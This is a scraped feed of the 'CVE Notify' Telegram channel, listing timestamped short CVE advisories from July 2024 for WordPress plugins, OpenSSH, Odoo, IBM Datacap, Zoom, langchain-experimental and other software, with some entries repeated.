🚨 CVE-2018-1000039In Artifex MuPDF 1.12.0 and earlier, multiple heap use after free bugs in the PDF parser could allow an attacker to execute arbitrary code, read memory, or cause a denial of service via a crafted file.🎖@cveNotify |
|
| 2024-07-15 19:37:32 |
🚨 CVE-2024-37386An issue was discovered in Stormshield Network Security (SNS) 4.0.0 through 4.3.25, 4.4.0 through 4.7.5, and 4.8.0. Certain manipulations allow restarting in single-user mode despite the activation of secure boot. The following versions fix this: 4.3.27, 4.7.6, and 4.8.1.🎖@cveNotify |
|
| 2024-07-15 19:37:26 |
🚨 CVE-2024-36438eLinkSmart Hidden Smart Cabinet Lock 2024-05-22 has Incorrect Access Control and fails to perform an authorization check which can lead to card duplication and other attacks.🎖@cveNotify |
|
| 2024-07-15 19:37:25 |
🚨 CVE-2024-36432An arbitrary memory write vulnerability was discovered in Supermicro X11DPG-HGX2, X11PDG-QT, X11PDG-OT, and X11PDG-SN motherboards with BIOS firmware before 4.4.🎖@cveNotify |
|
| 2024-07-15 19:37:24 |
🚨 CVE-2024-31946An issue was discovered in Stormshield Network Security (SNS) 3.7.0 through 3.7.41, 3.10.0 through 3.11.29, 4.0 through 4.3.24, and 4.4.0 through 4.7.4. A user who has access to the SNS with write access on the email alerts page has the ability to create alert email containing malicious JavaScript, executed by the template preview. The following versions fix this: 3.7.42, 3.11.30, 4.3.25, and 4.7.5.🎖@cveNotify |
|
| 2024-07-15 19:07:24 |
🚨 CVE-2023-6966The The Moneytizer plugin for WordPress is vulnerable to unauthorized access of data, modification of data, and loss of data due to a missing capability check on multiple AJAX functions in the /core/core_ajax.php file in all versions up to, and including, 9.5.20. This makes it possible for authenticated attackers, with subscriber access and above, to update and retrieve billing and bank details, update and reset the plugin's settings, and update languages as well as other lower-severity actions.🎖@cveNotify |
|
| 2024-07-15 18:37:36 |
🚨 CVE-2024-40415A vulnerability in /goform/SetStaticRouteCfg in the sub_519F4 function in Tenda AX1806 1.0.0.1 firmware leads to stack-based buffer overflow.🎖@cveNotify |
|
| 2024-07-15 18:37:35 |
🚨 CVE-2024-39826Path traversal in Team Chat for some Zoom Workplace Apps and SDKs for Windows may allow an authenticated user to conduct information disclosure via network access.🎖@cveNotify |
|
| 2024-07-15 18:37:31 |
🚨 CVE-2024-39820Uncontrolled search path element in the installer for Zoom Workplace Desktop App for macOS before version 6.0.10 may allow an authenticated user to conduct a denial of service via local access.🎖@cveNotify |
|
| 2024-07-15 18:37:30 |
🚨 CVE-2024-27241Improper input validation in some Zoom Apps and SDKs may allow an authenticated user to conduct a denial of service via network access.🎖@cveNotify |
|
| 2024-07-15 18:37:26 |
🚨 CVE-2024-27238Race condition in the installer for some Zoom Apps and SDKs for Windows before version 6.0.0 may allow an authenticated user to conduct a privilege escalation via local access.🎖@cveNotify |
|
| 2024-07-15 18:37:25 |
🚨 CVE-2024-6035A Stored Cross-Site Scripting (XSS) vulnerability exists in gaizhenbiao/chuanhuchatgpt version 20240410. This vulnerability allows an attacker to inject malicious JavaScript code into the chat history file. When a victim uploads this file, the malicious script is executed in the victim's browser. This can lead to user data theft, session hijacking, malware distribution, and phishing attacks.🎖@cveNotify |
|
| 2024-07-15 18:37:24 |
🚨 CVE-2024-38433Nuvoton - CWE-305: Authentication Bypass by Primary WeaknessAn attacker with write access to the SPI-Flash on an NPCM7xx BMC subsystem that uses the Nuvoton BootBlockreference code can modify the u-boot image header on flash parsed by the BootBlock which could lead to arbitrary codeexecution.🎖@cveNotify |
|
| 2024-07-15 17:37:31 |
🚨 CVE-2024-40414A vulnerability in /goform/SetNetControlList in the sub_656BC function in Tenda AX1806 1.0.0.1 firmware leads to stack-based buffer overflow.🎖@cveNotify |
|
| 2024-07-15 17:37:30 |
🚨 CVE-2024-4626The JetWidgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘layout_type’ and 'id' parameters in all versions up to, and including, 1.0.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-15 17:37:26 |
🚨 CVE-2024-3627The Wheel of Life: Coaching and Assessment Tool for Life Coach plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on several functions in the AjaxFunctions.php file in all versions up to, and including, 1.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary posts and modify settings.🎖@cveNotify |
|
| 2024-07-15 17:37:25 |
🚨 CVE-2024-30299Adobe Framemaker Publishing Server versions 2020.3, 2022.2 and earlier are affected by an Improper Authentication vulnerability that could result in privilege escalation. An attacker could exploit this vulnerability to gain unauthorized access or elevated privileges within the application. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-07-15 17:37:24 |
🚨 CVE-2024-3073The Easy WP SMTP by SendLayer – WordPress SMTP and Email Log Plugin plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 2.3.0. This is due to plugin providing the SMTP password in the SMTP Password field when viewing the settings. This makes it possible for authenticated attackers, with administrative-level access and above, to view the SMTP password for the supplied server. Although this would not be useful for attackers in most cases, if an administrator account becomes compromised this could be useful information to an attacker in a limited environment.🎖@cveNotify |
|
| 2024-07-15 17:07:31 |
🚨 CVE-2024-3602The Pop ups, Exit intent popups, email popups, banners, bars, countdowns and cart savers – Promolayer plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the disconnect_promolayer function in all versions up to, and including, 1.1.0. This makes it possible for authenticated attackers, with subscriber access or higher, to remove the Promolayer connection.🎖@cveNotify |
|
| 2024-07-15 17:07:30 |
🚨 CVE-2024-3562The Custom Field Suite plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 2.6.7 via the Loop custom field. This is due to insufficient sanitization of input prior to being used in a call to the eval() function. This makes it possible for authenticated attackers, with contributor-level access and above, to execute arbitrary PHP code on the server.🎖@cveNotify |
|
| 2024-07-15 17:07:26 |
🚨 CVE-2024-3561The Custom Field Suite plugin for WordPress is vulnerable to SQL Injection via the the 'Term' custom field in all versions up to, and including, 2.6.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-07-15 17:07:25 |
🚨 CVE-2024-4371The CoDesigner WooCommerce Builder for Elementor – Customize Checkout, Shop, Email, Products & More plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.4.1 via deserialization of untrusted input from the recently_viewed_products cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-07-15 17:07:24 |
🚨 CVE-2024-4176An Cross site scripting vulnerability in the EDR XConsole before this release allowed an attacker to potentially leverage an XSS/HTML-Injection using command line variables. A malicious threat actor could execute commands on the victim's browser for sending carefully crafted malicious links to the EDR XConsole end user.🎖@cveNotify |
|
| 2024-07-15 15:37:26 |
🚨 CVE-2024-6716A flaw was found in libtiff. This flaw allows an attacker to create a crafted tiff file, forcing libtiff to allocate memory indefinitely. This issue can result in a denial of service of the system consuming libtiff due to memory starvation.🎖@cveNotify |
|
| 2024-07-15 15:37:25 |
🚨 CVE-2024-38495A specific authentication strategy allows a malicious attacker to learn ids of all PAM users defined in its database.🎖@cveNotify |
|
| 2024-07-15 14:07:25 |
🚨 CVE-2024-5444The Bible Text WordPress plugin through 0.2 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-07-15 14:07:24 |
🚨 CVE-2024-5441The Modern Events Calendar plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the set_featured_image function in all versions up to, and including, 7.11.0. This makes it possible for authenticated attackers, with subscriber access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. The plugin allows administrators (via its settings) to extend the ability to submit events to unauthenticated users, which would allow unauthenticated attackers to exploit this vulnerability.🎖@cveNotify |
|
| 2024-07-15 13:07:42 |
🚨 CVE-2024-4752The EventON WordPress plugin before 2.2.15 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-07-15 13:07:41 |
🚨 CVE-2024-4269The SVG Block WordPress plugin before 1.1.20 does not sanitize SVG file contents, which enables users with at least the author role to SVG with malicious JavaScript to conduct Stored XSS attacks.🎖@cveNotify |
|
| 2024-07-15 13:07:40 |
🚨 CVE-2024-4217The shortcodes-ultimate-pro WordPress plugin before 7.1.5 does not properly escape some of its shortcodes' settings, making it possible for attackers with a Contributor account to conduct Stored XSS attacks.🎖@cveNotify |
|
| 2024-07-15 13:07:37 |
🚨 CVE-2024-3964The Product Enquiry for WooCommerce WordPress plugin before 3.1.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-07-15 13:07:36 |
🚨 CVE-2024-3919The OpenPGP Form Encryption for WordPress plugin before 1.5.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2024-07-15 13:07:35 |
🚨 CVE-2024-3751The Seriously Simple Podcasting WordPress plugin before 3.3.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-07-15 13:07:32 |
🚨 CVE-2024-3710The Image Photo Gallery Final Tiles Grid WordPress plugin before 3.6.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-07-15 13:07:31 |
🚨 CVE-2024-3026The WordPress Button Plugin MaxButtons WordPress plugin before 9.7.8 does not sanitise and escape some parameters, which could allow users with a role as low as editor to perform Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-07-15 13:07:30 |
🚨 CVE-2023-39329A flaw was found in OpenJPEG. A resource exhaustion can occur in the opj_t1_decode_cblks function in tcd.c through a crafted image file, causing a denial of service.🎖@cveNotify |
|
| 2024-07-15 13:07:26 |
🚨 CVE-2024-31947StoneFly Storage Concentrator (SC and SCVM) before 8.0.4.26 allows Directory Traversal by authenticated users. Using a crafted path parameter with the Online Help facility can expose sensitive system information.🎖@cveNotify |
|
| 2024-07-15 13:07:25 |
🚨 CVE-2023-41093Use After Free vulnerability in Silicon Labs Bluetooth SDK on 32 bit, ARM may allow an attacker with precise timing capabilities to intercept a small number of packets intended for a recipient that has left the network.This issue affects Silabs Bluetooth SDK: through 8.0.0.🎖@cveNotify |
|
| 2024-07-15 11:37:25 |
🚨 CVE-2024-6540Improper filtering of fields when using the export function in the ticket overview of the external interface in OTRS could allow an authorized user to download a list of tickets containing information about tickets of other customers. The problem only occurs if the TicketSearchLegacyEngine has been disabled by the administrator.This issue affects OTRS: 8.0.X, 2023.X, from 2024.X through 2024.4.x🎖@cveNotify |
|
| 2024-07-15 11:37:24 |
🚨 CVE-2024-23794An incorrect privilege assignment vulnerability in the inline editing functionality of OTRS can lead to privilege escalation. This flaw allows an agent with read-only permissions to gain full access to a ticket. This issue arises in very rare instances when an admin has previously enabled the setting 'RequiredLock' of 'AgentFrontend::Ticket::InlineEditing::Property###Watch' in the system configuration.This issue affects OTRS: * 8.0.X * 2023.X * from 2024.X through 2024.4.x🎖@cveNotify |
|
| 2024-07-15 08:37:24 |
🚨 CVE-2023-41916In Apache Linkis =1.4.0, due to the lack of effective filteringof parameters, an attacker configuring malicious Mysql JDBC parameters in the DataSource Manager Module will trigger arbitrary file reading. Therefore, the parameters in the Mysql JDBC URL should be blacklisted. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. Versions of Apache Linkis = 1.4.0 will be affected. We recommend users upgrade the version of Linkis to version 1.5.0.🎖@cveNotify |
|
| 2024-07-15 06:37:30 |
🚨 CVE-2024-6076The wp-cart-for-digital-products WordPress plugin before 8.5.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-07-15 06:37:26 |
🚨 CVE-2024-6074The wp-cart-for-digital-products WordPress plugin before 8.5.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-07-15 06:37:25 |
🚨 CVE-2024-6072The wp-cart-for-digital-products WordPress plugin before 8.5.5 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers🎖@cveNotify |
|
| 2024-07-15 06:37:24 |
🚨 CVE-2024-5630The Insert or Embed Articulate Content into WordPress plugin before 4.3000000024 does not prevent authors from uploading arbitrary files to the site, which may allow them to upload PHP shells on affected sites.🎖@cveNotify |
|
| 2024-07-15 05:37:24 |
🚨 CVE-2024-21513Versions of the package langchain-experimental from 0.0.15 and before 0.0.21 are vulnerable to Arbitrary Code Execution when retrieving values from the database, the code will attempt to call 'eval' on all values. An attacker can exploit this vulnerability and execute arbitrary python code if they can control the input prompt and the server is configured with VectorSQLDatabaseChain.**Notes:**Impact on the Confidentiality, Integrity and Availability of the vulnerable component:Confidentiality: Code execution happens within the impacted component, in this case langchain-experimental, so all resources are necessarily accessible.Integrity: There is nothing protected by the impacted component inherently. Although anything returned from the component counts as 'information' for which the trustworthiness can be compromised.Availability: The loss of availability isn't caused by the attack itself, but it happens as a result during the attacker's post-exploitation steps.Impact on the Confidentiality, Integrity and Availability of the subsequent system:As a legitimate low-privileged user of the package (PR:L) the attacker does not have more access to data owned by the package as a result of this vulnerability than they did with normal usage (e.g. can query the DB). The unintended action that one can perform by breaking out of the app environment and exfiltrating files, making remote connections etc. happens during the post exploitation phase in the subsequent system - in this case, the OS.AT:P: An attacker needs to be able to influence the input prompt, whilst the server is configured with the VectorSQLDatabaseChain plugin.🎖@cveNotify |
|
| 2024-07-15 04:37:24 |
🚨 CVE-2024-6739The session cookie in MailGates and MailAudit from Openfind does not have the HttpOnly flag enabled, allowing remote attackers to potentially steal the session cookie via XSS.🎖@cveNotify |
|
| 2024-07-15 03:37:30 |
🚨 CVE-2024-6737The access control in the Electronic Official Document Management System from 2100 TECHNOLOGY is not properly implemented, allowing remote attackers with regular privileges to access the account settings functionality and create an administrator account.🎖@cveNotify |
|
| 2024-07-15 03:37:26 |
🚨 CVE-2024-39740IBM Datacap Navigator 9.1.5, 9.1.6, 9.1.7, 9.1.8, and 9.1.9 displays version information in HTTP requests that could allow an attacker to gather information for future attacks against the system. IBM X-Force ID: 296009.🎖@cveNotify |
|
| 2024-07-15 03:37:25 |
🚨 CVE-2024-39729IBM Datacap Navigator 9.1.5, 9.1.6, 9.1.7, 9.1.8, and 9.1.9 could allow an authenticated user to obtain sensitive information from source code that could be used in further attacks against the system. IBM X-Force ID: 295968.🎖@cveNotify |
|
| 2024-07-15 03:37:24 |
🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-15 02:37:42 |
🚨 CVE-2024-39737IBM Datacap Navigator 9.1.5, 9.1.6, 9.1.7, 9.1.8, and 9.1.9 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 296004.🎖@cveNotify |
|
| 2024-07-15 02:37:41 |
🚨 CVE-2024-39736IBM Datacap Navigator 9.1.5, 9.1.6, 9.1.7, 9.1.8, and 9.1.9 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 296003.🎖@cveNotify |
|
| 2024-07-15 02:37:40 |
🚨 CVE-2024-39728IBM Datacap Navigator 9.1.5, 9.1.6, 9.1.7, 9.1.8, and 9.1.9 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 295967.🎖@cveNotify |
|
| 2024-07-15 02:37:36 |
🚨 CVE-2021-44775Cross-site scripting (XSS) issue in Website app of Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier, allows remote attackers to inject arbitrary web script in the browser of a victim, by posting crafted contents.🎖@cveNotify |
|
| 2024-07-15 02:37:35 |
🚨 CVE-2021-44476A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows authenticated administrators to read local files on the server, including sensitive configuration files.🎖@cveNotify |
|
| 2024-07-15 02:37:31 |
🚨 CVE-2021-44461Cross-site scripting (XSS) issue in Accounting app of Odoo Enterprise 13.0 through 15.0, allows remote attackers who are able to control the contents of accounting journal entries to inject arbitrary web script in the browser of a victim.🎖@cveNotify |
|
| 2024-07-15 02:37:30 |
🚨 CVE-2021-26263Cross-site scripting (XSS) issue in Discuss app of Odoo Community 14.0 through 15.0, and Odoo Enterprise 14.0 through 15.0, allows remote attackers to inject arbitrary web script in the browser of a victim, by posting crafted contents.🎖@cveNotify |
|
| 2024-07-15 02:37:26 |
🚨 CVE-2021-23186A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows authenticated administrators to access and modify database contents of other tenants, in a multi-tenant system.🎖@cveNotify |
|
| 2024-07-15 02:37:25 |
🚨 CVE-2021-23176Improper access control in reporting engine of l10n_fr_fec module in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows remote authenticated users to extract accounting information via crafted RPC packets.🎖@cveNotify |
|
| 2024-07-15 02:37:24 |
🚨 CVE-2021-23166A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows authenticated administrators to read and write local files on the server.🎖@cveNotify |
|
| 2024-07-15 01:37:25 |
🚨 CVE-2024-6736A vulnerability was found in SourceCodester Employee and Visitor Gate Pass Logging System 1.0. It has been rated as critical. This issue affects some unknown processing of the file view_employee.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271457 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-15 01:37:24 |
🚨 CVE-2024-6345A vulnerability in the package_index module of pypa/setuptools versions up to 69.1.1 allows for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system. The issue is fixed in version 70.0.🎖@cveNotify |
|
| 2024-07-15 00:37:25 |
🚨 CVE-2024-6735A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file setgeneral.php. The manipulation of the argument sitename/email/mobile/sms/currency leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271456.🎖@cveNotify |
|
| 2024-07-15 00:37:24 |
🚨 CVE-2024-6734A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been classified as critical. This affects an unknown part of the file templateadd.php. The manipulation of the argument title/msg leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271455.🎖@cveNotify |
|
| 2024-07-14 23:37:25 |
🚨 CVE-2024-6733A vulnerability was found in itsourcecode Tailoring Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file templateedit.php. The manipulation of the argument id/title/msg leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-271454 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-14 23:37:24 |
🚨 CVE-2024-6732A vulnerability classified as critical was found in SourceCodester Student Study Center Desk Management System 1.0. This vulnerability affects unknown code of the file /sscdms/classes/Users.php?f=save. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-271450 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-14 22:37:24 |
🚨 CVE-2024-2700A vulnerability was found in the quarkus-core component. Quarkus captures local environment variables from the Quarkus namespace during the application's build, therefore, running the resulting application inherits the values captured at build time. Some local environment variables may have been set by the developer or CI environment for testing purposes, such as dropping the database during application startup or trusting all TLS certificates to accept self-signed certificates. If these properties are configured using environment variables or the .env facility, they are captured into the built application, which can lead to dangerous behavior if the application does not override these values. This behavior only happens for configuration properties from the `quarkus.*` namespace. Application-specific properties are not captured.🎖@cveNotify |
|
| 2024-07-14 19:37:24 |
🚨 CVE-2024-31082A heap-based buffer over-read vulnerability was found in the X.org server's ProcAppleDRICreatePixmap() function. This issue occurs when byte-swapped length values are used in replies, potentially leading to memory leakage and segmentation faults, particularly when triggered by a client with a different endianness. This vulnerability could be exploited by an attacker to cause the X server to read heap memory values and then transmit them back to the client until encountering an unmapped page, resulting in a crash. Despite the attacker's inability to control the specific memory copied into the replies, the small length values typically stored in a 32-bit integer can result in significant attempted out-of-bounds reads.🎖@cveNotify |
|
| 2024-07-14 17:37:25 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-14 17:37:24 |
🚨 CVE-2024-5037A flaw was found in OpenShift's Telemeter. If certain conditions are in place, an attacker can use a forged token to bypass the issue ("iss") check during JSON web token (JWT) authentication.🎖@cveNotify |
|
| 2024-07-14 16:30:33 |
CVE Notify pinned «🚨 For advertising in the channel, contact @SirMalware» |
|
| 2024-07-14 16:30:29 |
🚨 For advertising in the channel, contact @SirMalware |
|
| 2024-07-14 13:37:26 |
🚨 CVE-2024-39734IBM Datacap Navigator 9.1.5, 9.1.6, 9.1.7, 9.1.8, and 9.1.9 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 296001.🎖@cveNotify |
|
| 2024-07-14 13:37:25 |
🚨 CVE-2024-39733IBM Datacap Navigator 9.1.5, 9.1.6, 9.1.7, 9.1.8, and 9.1.9 stores user credentials in plain clear text which can be read by a local user. IBM X-Force ID: 295972.🎖@cveNotify |
|
| 2024-07-14 13:37:24 |
🚨 CVE-2024-39732IBM Datacap Navigator 9.1.5, 9.1.6, 9.1.7, 9.1.8, and 9.1.9 temporarily stores data from different environments that could be obtained by a malicious user. IBM X-Force ID: 295791.🎖@cveNotify |
|
| 2024-07-14 02:37:25 |
🚨 CVE-2024-6730A vulnerability was found in Nanjing Xingyuantu Technology SparkShop up to 1.1.6. It has been rated as critical. This issue affects some unknown processing of the file /api/Common/uploadFile. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271403.🎖@cveNotify |
|
| 2024-07-14 02:37:24 |
🚨 CVE-2024-6729A vulnerability was found in SourceCodester Kortex Lite Advocate Office Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /control/add_act.php. The manipulation of the argument aname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-271402 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-14 01:37:24 |
🚨 CVE-2024-6728A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been classified as critical. This affects an unknown part of the file typeedit.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271401 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-13 23:37:24 |
🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-13 13:37:24 |
🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-13 12:37:24 |
🚨 CVE-2024-6465The WP Links Page plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wplf_ajax_update_screenshots' function in all versions up to, and including, 4.9.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to regenerate the link's thumbnail image.🎖@cveNotify |
|
| 2024-07-13 06:37:42 |
🚨 CVE-2024-5032The SULly WordPress plugin before 4.3.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-07-13 06:37:41 |
🚨 CVE-2024-5002The User Submitted Posts WordPress plugin before 20240516 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-07-13 06:37:37 |
🚨 CVE-2024-4977The Index WP MySQL For Speed WordPress plugin before 1.4.18 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-07-13 06:37:36 |
🚨 CVE-2024-4602The Embed Peertube Playlist WordPress plugin before 1.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-07-13 06:37:35 |
🚨 CVE-2024-4269The SVG Block WordPress plugin before 1.1.20 does not sanitize SVG file contents, which enables users with at least the author role to SVG with malicious JavaScript to conduct Stored XSS attacks.🎖@cveNotify |
|
| 2024-07-13 06:37:31 |
🚨 CVE-2024-3963The Giveaways and Contests by RafflePress WordPress plugin before 1.12.14 does not sanitise and escape some parameters, which could allow users with a role as low as editor to perform Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-07-13 06:37:30 |
🚨 CVE-2024-3753The Hostel WordPress plugin before 1.1.5.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-07-13 06:37:26 |
🚨 CVE-2024-3710The Image Photo Gallery Final Tiles Grid WordPress plugin before 3.6.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-07-13 06:37:25 |
🚨 CVE-2024-3026The WordPress Button Plugin MaxButtons WordPress plugin before 9.7.8 does not sanitise and escape some parameters, which could allow users with a role as low as editor to perform Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-07-13 06:37:24 |
🚨 CVE-2024-2870The socialdriver-framework WordPress plugin before 2024.04.30 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-07-13 04:37:24 |
🚨 CVE-2024-6409A race condition vulnerability was discovered in how signals are handled by OpenSSH's server (sshd). If a remote attacker does not authenticate within a set time period, then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). As a consequence of a successful attack, in the worst case scenario, an attacker may be able to perform a remote code execution (RCE) as an unprivileged user running the sshd server.🎖@cveNotify |
|
| 2024-07-13 03:37:24 |
🚨 CVE-2023-39327A flaw was found in OpenJPEG. Maliciously constructed pictures can cause the program to enter a large loop and continuously print warning messages on the terminal.🎖@cveNotify |
|
| 2024-07-13 00:37:24 |
🚨 CVE-2024-38112Windows MSHTML Platform Spoofing Vulnerability🎖@cveNotify |
|
| 2024-07-12 23:37:25 |
🚨 CVE-2024-31947StoneFly Storage Concentrator (SC and SCVM) before 8.0.4.26 allows Directory Traversal by authenticated users. Using a crafted path parameter with the Online Help facility can expose sensitive system information.🎖@cveNotify |
|
| 2024-07-12 23:37:24 |
